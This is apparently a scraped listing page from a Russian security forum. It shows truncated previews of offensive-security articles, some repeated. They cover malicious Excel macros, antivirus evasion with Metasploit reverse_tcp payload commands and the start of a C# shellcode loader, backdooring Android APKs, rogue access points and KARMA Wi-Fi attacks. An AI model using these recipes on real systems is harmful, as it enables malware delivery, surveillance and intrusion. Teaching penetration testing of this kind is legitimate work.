-
🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»
🛡 Научитесь находить и использовать уязвимости веб-приложений.
🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.Доступ открыт прямо сейчас — Записаться бесплатно
Форум информационной безопасности - Codeby.net
Статья PowerShell для хакера (часть III) [LuckyStrike - создание вредоносных макросов]
Часть 3
Предыдущая частьСледующая часть
Все части
Привет колеги)
Сегодня продолжим обогащать себя возможностями PowerShell с точки зрение информационной безопасности,вооружившись знаниями из моей прошлой статьи , мы познакомимся с таким проектом как LuckyStrike , и научимся с его помощью создавать зловредные Microsoft Exel документы.
И так в первую очередь для корректной работы утилиты LuckyStrike над будет необходимо:
- Windows (7-10)
- PowerShell не меньше версии v5
- Установленный...
Статья AV ByPass с помощью C#
Привет. Господа хекеры. Рассмотрим вариант байпасса антивирусов с помощью языка C#.
Обо всё предлагаю по порядку и для начала сгенерируем полезную нагрузку в метасплоите.
Устанавливаем опции
И генерируем нашу нагрузку для языка C#
А дальше берем нагрузку и вставляем в код ниже в переменную buf
Обо всё предлагаю по порядку и для начала сгенерируем полезную нагрузку в метасплоите.
Код:
use windows/meterpreter/reverse_tcpУстанавливаем опции
Код:
set LHOST 192.168.1.237
set LPORT 1338
set EXITFUNC thread
Код:
generate -e x86/shikata_ga_nai -b '\x00' -i 3 -t csharpА дальше берем нагрузку и вставляем в код ниже в переменную buf
Код:
using System;
using System.Runtime.InteropServices;
namespace ShellCodeByPass
{
public class Program
{
[Flags]
public enum AllocationType : uint
{
COMMIT = 0x1000,
RESERVE = 0x2000,
RESET = 0x80000,
LARGE_PAGES = 0x20000000,
PHYSICAL = 0x400000,
TOP_DOWN = 0x100000,
WRITE_WATCH = 0x200000
}...Статья REVERSE или BIND shell? В чем разница?Какой выбрать?
Приветствую Вас колеги. Сегодня появилась необходимость написать небольшой мануал для новичков в котором я попытаюсь донести в чем же таки разница между REVERSE и BIND шеллом и какие самые распространенные способы его получить существуют.
Это в первую очередь нужно мне для того что бы можно было ссылаться на этот мануал
в своих статьях,и чаще всего я буду упоминать этот мануал при прохождении дальнейших тасков в лаборатории тестирования на проникновения.
Итак.Для начала давайте попытаемся понять что такое SHELL?
Ну если не кормить вас линками на википедию и всякие умные высказывания - то на простом человеческом языке,SHELL - это оболочка консоли (в Windows это командная строка "cmd.exe") а (в Linux это терминал "bash,sh,zsh ... ") Ну а всякий раз когда вы...
Это в первую очередь нужно мне для того что бы можно было ссылаться на этот мануал
в своих статьях,и чаще всего я буду упоминать этот мануал при прохождении дальнейших тасков в лаборатории тестирования на проникновения.
Итак.Для начала давайте попытаемся понять что такое SHELL?
Ну если не кормить вас линками на википедию и всякие умные высказывания - то на простом человеческом языке,SHELL - это оболочка консоли (в Windows это командная строка "cmd.exe") а (в Linux это терминал "bash,sh,zsh ... ") Ну а всякий раз когда вы...
Jarvis. Python Voice Controlled Assistant
Всем привет! В этой статье я покажу, как установить голосового помощника Jarvis на Kali Linux OS.
Для начала устанавливаем, необходимы пакеты:
> apt-get install libasound-dev libjack-jackd2-dev portaudio19-dev python-pyaudio build-essential python-dev libespeak1
Затем скачиваем Jarvis с Github:
> git clone https://github.com/m4n3dw0lf/Jarvis
> cd Jarvis
> pip install -r requirements.txt
После установки всех необходимых зависимостей, запустим Jarvis:
> ./jarvis.py –h
Теперь можно начинать общение
Спасибо за внимание.
Для начала устанавливаем, необходимы пакеты:
> apt-get install libasound-dev libjack-jackd2-dev portaudio19-dev python-pyaudio build-essential python-dev libespeak1
Затем скачиваем Jarvis с Github:
> git clone https://github.com/m4n3dw0lf/Jarvis
> cd Jarvis
> pip install -r requirements.txt
После установки всех необходимых зависимостей, запустим Jarvis:
> ./jarvis.py –h
Теперь можно начинать общение
Спасибо за внимание.
Статья Pythem – Penetration Testing Framework.
Всем привет! В этой статье я хочу показать довольно новый инструмент для проведения тестирования на проникновение. Называется он Pythem – Penetration Testing Framework.
Framework написан на языке Python, что, позволяет легко кастомизировать его под свои цели.
Список изменений в версии: PytheM v0.5.7
· Modules: pforensic – pcap analyzer v0.3
· core: fix sniffer.py
· DHCP ACK Injection spoofing.
Подготовка к установке Framework’a:
1. Установим необходимые пакеты. ( Одной из особенностей Framework’а является возможность голосового управления с помощью Jarvis)
> apt-get install libasound-dev libjack-jackd2-dev portaudio19-dev python-pyaudio build-essential python-dev libnetfilter-queue-dev libespeak1 libffi-dev libssl-dev
2. Затем установим сам Pythem Framework:
> git clone https://github.com/m4n3dw0lf/PytheM
> cd...
Framework написан на языке Python, что, позволяет легко кастомизировать его под свои цели.
Список изменений в версии: PytheM v0.5.7
· Modules: pforensic – pcap analyzer v0.3
· core: fix sniffer.py
· DHCP ACK Injection spoofing.
Подготовка к установке Framework’a:
1. Установим необходимые пакеты. ( Одной из особенностей Framework’а является возможность голосового управления с помощью Jarvis)
> apt-get install libasound-dev libjack-jackd2-dev portaudio19-dev python-pyaudio build-essential python-dev libnetfilter-queue-dev libespeak1 libffi-dev libssl-dev
2. Затем установим сам Pythem Framework:
> git clone https://github.com/m4n3dw0lf/PytheM
> cd...
Python Script MITMAP
Всем привет! В этой стать я хочу вас ознакомить с очередным инструментом для пентестинга. В этот раз, это будет скрипт, написанный на Python под названием MITMAP. По словам разработчиков, его основное назначения – это создание поддельной точки доступа и сниффинг данных из эфира.
Требования:
· Kali Linux / Raspbian с привилегиями root.
· Wi-Fi адаптер и интернет адаптер или 2 Wi-fi карты.
Установим программу:
> git clone https://github.com/xdavidhu/mitmAP
> cd mitmAP
> ls –a
> chmod a+x mitmAP.py
Теперь запустим программу, но делать это необходимо не от root’a а от пользователя, состоящего в группе sudo.
> sudo python3 mitmAP.py
После установки зависимостей, задаем программе настройки в соответствии с выбранным сценарием атаки.
В итоге создастся точка доступа с выбранными вами параметрами, и запустится Wireshark для сбора и анализа...
Требования:
· Kali Linux / Raspbian с привилегиями root.
· Wi-Fi адаптер и интернет адаптер или 2 Wi-fi карты.
Установим программу:
> git clone https://github.com/xdavidhu/mitmAP
> cd mitmAP
> ls –a
> chmod a+x mitmAP.py
Теперь запустим программу, но делать это необходимо не от root’a а от пользователя, состоящего в группе sudo.
> sudo python3 mitmAP.py
После установки зависимостей, задаем программе настройки в соответствии с выбранным сценарием атаки.
В итоге создастся точка доступа с выбранными вами параметрами, и запустится Wireshark для сбора и анализа...
Статья Типы полезных нагрузок (Payloads)
Всем привет, в этой статье я хочу подробно рассмотреть тему полезных нагрузок (Payload), их особенности и типы. Я полагаю, новичкам будет интересно узнать, с чем они имеют дело, и как это работает. В качестве примера будем рассматривать Metaslpoit Framework, так как он содержит различные уникальные типы полезных нагрузок.
Рассмотрим различные типы Payloads:
Встроенная (Не поэтапная)
· Одиночная полезная нагрузка, содержащая эксплоит и полный шеллкод, для выбранной задачи. Встроенные пайлоады более стабильны, чем некоторые другие, потому что они содержат все инструменты в одном файле. Однако есть эксплойты, которые не поддерживают полученный размер этих полезных нагрузок, в результате компиляции.
Meterpreter
· Короткая форма мета-интерпретатора, которая является передовой на данный момент, а так же многогранной в плане применения. Работает с помощью инъекции DLL. Meterpreter полностью находится в памяти удаленного хоста и не оставляет никаких данных...
Рассмотрим различные типы Payloads:
Встроенная (Не поэтапная)
· Одиночная полезная нагрузка, содержащая эксплоит и полный шеллкод, для выбранной задачи. Встроенные пайлоады более стабильны, чем некоторые другие, потому что они содержат все инструменты в одном файле. Однако есть эксплойты, которые не поддерживают полученный размер этих полезных нагрузок, в результате компиляции.
Meterpreter
· Короткая форма мета-интерпретатора, которая является передовой на данный момент, а так же многогранной в плане применения. Работает с помощью инъекции DLL. Meterpreter полностью находится в памяти удаленного хоста и не оставляет никаких данных...
Статья Взлом Android - устройства. (Backdoor-apk + HTA server)
Всем привет! В этой теме я хочу показать еще один способ взлома Android – устройства, на мой взгляд, не сложный, но действенный. Использовать будем QR-код, HTA – сервер и естественно Kali Linux.
Для начала нам потребуется софт, для того, чтобы поместить полезную нагрузку в APK – файл. Мы будем использовать Backdoor-apk, скачаем его с Github командой:
> git clone https://github.com/dana-at-cp/backdoor-apk.git
Затем установим все необходимые библиотеки.
> apt-get install lib32stdc++6 lib32ncurses5 lib32z1
Теперь нам понадобится приложение, в которое мы будем «вшивать» полезную нагрузку, для этого перейдем на сайт apk4fun.com и выберем понравившееся. Сразу оговорюсь, что я перепробовал порядка ста приложений, но большинство из них не компилировалось, при попытке записать нагрузку в него. Еще какая-то часть работала с ошибками. Так же я сталкивался с...
Для начала нам потребуется софт, для того, чтобы поместить полезную нагрузку в APK – файл. Мы будем использовать Backdoor-apk, скачаем его с Github командой:
> git clone https://github.com/dana-at-cp/backdoor-apk.git
Затем установим все необходимые библиотеки.
> apt-get install lib32stdc++6 lib32ncurses5 lib32z1
Теперь нам понадобится приложение, в которое мы будем «вшивать» полезную нагрузку, для этого перейдем на сайт apk4fun.com и выберем понравившееся. Сразу оговорюсь, что я перепробовал порядка ста приложений, но большинство из них не компилировалось, при попытке записать нагрузку в него. Еще какая-то часть работала с ошибками. Так же я сталкивался с...
KARMA-атака с FruityWifi
Не мог пропустить такое интересное направление атак на беспроводные сети как KARMA. Самое известное воплощение этой уязвимости легендарный роутер/аппаратный сниффер Pineapple Mark от компании Hak5.
Сей девайс собирает beacon-фреймы, содержащие названия точек доступа. Каждое устройство, подключавшееся ранее по WiFi сохраняет у себя SSID знакомых точек, чтобы подключиться, когда снова будет в зоне его покрытия. Эти "имена" точек доступа потом используются чтобы притвориться знакомой ранее точкой. При переключении никакой авторизации не требуется, устройство будет полагать что оно подключено к "домашнему" вайфаю. Второй важный момент - устройство глушит настоящую точку доступа.
В итоге мы получает "злого двойника", который глушит настоящую точку доступа и автоматически переключает клиентов в обход авторизации.
Лично мне зачастую лень ждать перебора WPS reaver-ом или bully. А если у точки стоит ограничение 10 попыток в 5 минут, перебор занимает несколько суток...
Сей девайс собирает beacon-фреймы, содержащие названия точек доступа. Каждое устройство, подключавшееся ранее по WiFi сохраняет у себя SSID знакомых точек, чтобы подключиться, когда снова будет в зоне его покрытия. Эти "имена" точек доступа потом используются чтобы притвориться знакомой ранее точкой. При переключении никакой авторизации не требуется, устройство будет полагать что оно подключено к "домашнему" вайфаю. Второй важный момент - устройство глушит настоящую точку доступа.
В итоге мы получает "злого двойника", который глушит настоящую точку доступа и автоматически переключает клиентов в обход авторизации.
Лично мне зачастую лень ждать перебора WPS reaver-ом или bully. А если у точки стоит ограничение 10 попыток в 5 минут, перебор занимает несколько суток...
